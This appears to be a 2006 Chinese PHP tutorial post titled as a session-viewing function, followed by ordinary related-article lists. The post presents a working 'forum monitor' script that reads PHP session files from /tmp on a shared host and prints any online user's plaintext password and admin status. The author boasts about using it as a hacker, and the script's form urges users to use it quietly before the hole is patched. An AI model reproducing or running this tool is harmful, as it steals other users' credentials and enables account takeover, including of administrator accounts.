一个查看session内容的函数


Posted in PHP onOctober 09, 2006

之所以是能写出来这个函数,主要是对该网站的session结构清楚,如:name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1",也知道该session存放的位置,而且可以上传文件,所以嘛,当时就做了一次小小的黑客,在线的朋友的密码可以一览无余,呵呵:
<?
function submit1(){
global $username;
print "<title>论坛监听器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧?连我你也查?";
  return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用户笔名:".$name[2]."<br>使用密码:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理员</font>";
else
print "一般用户";
print"<br><br>偷窃他人密码是不道德行为请少少为之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用户:".$username."真的在线吗?如你确定,<a href='javascript:history.go(-1)'>请再来一次</a>,不要多打空格!";
$d->close();
}

function login(){
?>
<html>
<head>
<title>论坛监听器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>论坛监听器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">当你看到一用户在线时你想看他的密码,你要如何作呢?</td>
</tr>
<tr>
<td colspan="2">让我来告诉你:就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>郑重申明:本程序为自由程序,由它所造成的任何损失本人盖不负责。</font>
<br>不过这个问题也许很快就会被堵上,个位还是不要张扬的偷着用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>请输入你要查的用户名:<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,开始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

PHP 相关文章推荐
在PHP中使用XML
Oct 09 PHP
PHP 日期时间函数的高级应用技巧
Oct 10 PHP
关于svn冲突的解决方法
Jun 21 PHP
php缓冲 output_buffering和ob_start使用介绍
Jan 30 PHP
纯PHP生成的一个树叶图片画图例子
Apr 16 PHP
php+xml结合Ajax实现点赞功能完整实例
Jan 30 PHP
php cookie工作原理与实例详解
Jul 18 PHP
适合PHP初学者阅读的4本经典书籍
Sep 23 PHP
Thinkphp框架 表单自动验证登录注册 ajax自动验证登录注册
Dec 27 PHP
PHP回调函数与匿名函数实例详解
Aug 16 PHP
php处理多图上传压缩代码功能
Jun 13 PHP
TP5框架实现自定义分页样式的方法示例
Apr 05 PHP
一个显示天气预报的程序
Oct 09 #PHP
web方式ftp
Oct 09 #PHP
php中文本数据翻页(留言本翻页)
Oct 09 #PHP
自己动手做一个SQL解释器
Oct 09 #PHP
GD输出汉字的函数的分析
Oct 09 #PHP
类的另类用法--数据的封装
Oct 09 #PHP
最小化数据传输――在客户端存储数据
Oct 09 #PHP
You might like
PHP实现MySQL更新记录的代码
2008/06/07 PHP
解析thinkphp import 文件内容变量失效的问题
2013/06/20 PHP
PHP实现的简单网络硬盘
2015/07/29 PHP
PHP7.0安装笔记整理
2015/08/28 PHP
php结合mysql与mysqli扩展处理事务的方法
2016/06/29 PHP
jQuery UI插件自定义confirm确认框的方法
2015/03/20 Javascript
省市联动效果的简单实现代码(推荐)
2016/06/06 Javascript
JavaScript提升性能的常用技巧总结【经典】
2016/06/20 Javascript
jQuery ztree实现动态树形多选菜单
2016/08/12 Javascript
JS获取checkbox的个数简单实例
2016/08/19 Javascript
利用js编写响应式侧边栏
2016/09/17 Javascript
一个极为简单的requirejs实现方法
2016/10/20 Javascript
Bootstrap基本组件学习笔记之下拉菜单(7)
2016/12/07 Javascript
浅谈Angular文字折叠展开组件的原理分析
2017/11/24 Javascript
jQuery实现的鼠标响应缓冲动画效果示例
2018/02/13 jQuery
layui监听单元格编辑前后交互的例子
2019/09/16 Javascript
vue遍历对象中的数组取值示例
2019/11/07 Javascript
js中switch语句的学习笔记
2020/03/25 Javascript
Python编程中对super函数的正确理解和用法解析
2016/07/02 Python
python 环境变量和import模块导入方法(详解)
2017/07/11 Python
Python 操作文件的基本方法总结
2017/08/10 Python
Python二叉树定义与遍历方法实例分析
2018/05/25 Python
Python简易版停车管理系统
2019/08/12 Python
使用python写的opencv实时监测和解析二维码和条形码
2019/08/14 Python
Python实现使用dir获取类的方法列表
2019/12/24 Python
python 成功引入包但无法正常调用的解决
2020/03/09 Python
One.com挪威:北欧成长最快的网络托管公司
2016/11/19 全球购物
Zooplus葡萄牙:欧洲领先的网上宠物商店
2018/07/01 全球购物
悬空寺导游词
2015/02/05 职场文书
奖励申请报告范文
2015/05/15 职场文书
python实现剪贴板的操作
2021/07/01 Python
mysql 生成连续日期及变量赋值
2022/03/20 MySQL
Win10防火墙白名单怎么设置?Win10添加防火墙白名单方法
2022/04/06 数码科技
SQL Server的存储过程与触发器以及系统函数和自定义函数
2022/04/10 SQL Server
Elasticsearch 配置详解
2022/04/19 Java/Android
html解决浏览器记住密码输入框的问题
2023/05/07 HTML / CSS